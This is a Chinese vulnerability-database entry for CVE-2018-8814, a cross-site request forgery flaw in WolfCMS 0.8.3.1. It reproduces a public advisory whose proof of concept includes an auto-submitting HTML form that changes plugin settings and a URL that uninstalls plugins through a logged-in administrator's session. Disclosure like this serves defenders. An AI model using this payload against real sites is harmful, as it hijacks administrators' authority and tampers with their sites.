CVE-2018-8814
CVSSN/A
发布时间 :2018-04-04 11:29:00
修订时间 :2018-04-11 21:29:12
NMP    

[原文]Cross-site request forgery (CSRF) vulnerability in WolfCMS 0.8.3.1 allows remote attackers to hijack the authentication of users for requests that modify plugin/[pluginname]/settings by crafting a malicious request.


[CNNVD]CNNVD数据暂缺。


[机译]译文暂缺.

- CVSS (基础分值)

CVSS暂不可用

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8814
(官方数据源) NVD

- 其它链接及资源

https://docs.google.com/document/d/19X9j9lMVrH7VPhyMEdqidqgW4VBhXaFibuBDyiPxJjc/edit?usp=sharing
(UNKNOWN)  MISC  https://docs.google.com/document/d/19X9j9lMVrH7VPhyMEdqidqgW4VBhXaFibuBDyiPxJjc/edit?usp=sharing
https://github.com/wolfcms/wolfcms/issues/671
(UNKNOWN)  MISC  https://github.com/wolfcms/wolfcms/issues/671
https://www.exploit-db.com/exploits/44418/
(UNKNOWN)  EXPLOIT-DB  44418

- 漏洞信息 (F147092)

WolfCMS 0.8.3.1 Cross Site Request Forgery (PacketStormID:F147092)
2018-04-07 00:00:00
Sureshbabu Narvaneni  
exploit,csrf
CVE-2018-8814
[点击下载]

WolfCMS version 0.8.3.1 suffers from a cross site request forgery vulnerability.

#######################################
# Exploit Title: WolfCMS 0.8.3.1 Cross Site Request Forgery
# Google Dork: N/A
# Date: 04-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://www.wolfcms.org
# Software Link:
https://bitbucket.org/wolfcms/wolf-cms-downloads/downloads/wolfcms-0.8.3.1.zip
# Affected Version: 0.8.3.1
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-8814
#
# 1. Vendor Description:
#
# Light-weight, fast, simple and powerful CMS. PHP-based, easily extended
CMS. Uses MySQL, SQLite or (from 0.7)
# PostgreSQL for db. Simple drag & drop page hierarchy. Open source,
licensed under GPLv3.
#
# 2. Technical Description:
#
# Cross-site request forgery (CSRF) vulnerability in WolfCMS before 0.8.3.1
allows remote attackers to hijack the
# authentication of users for requests that modify
plugin/[pluginname]/settings and can uninstall plugins by sending
# malicious request.
#
# 3. Proof Of Concept:
#
# Send below request to logged in user to change the plugin settings.
#
#<html>
#  <body>
#    <form action="http://[URL]/wolf/wolfcms/?/admin/plugin/archive/save"
method="POST">
#      <input type="hidden" name="settings[use_dates]"
value="1" />
#      <input type="hidden" name="commit" value="Save" />
#      <input type="submit" value="Submit request" />
#    </form>
#     <script>
#      document.forms[0].submit();
#            </script>
# </body>
#</html>
#
# Share the below URL to uninstall any plugin remotely.
#
# http://[url]/wolfcms/?/admin/setting/uninstall_plugin/[pluginname]
#
#
# 4. Solution:
#
# Upgrade to latest release.
# http://www.wolfcms.org/blog.html
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8814
# https://github.com/wolfcms/wolfcms/issues/671
#####################################

    
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站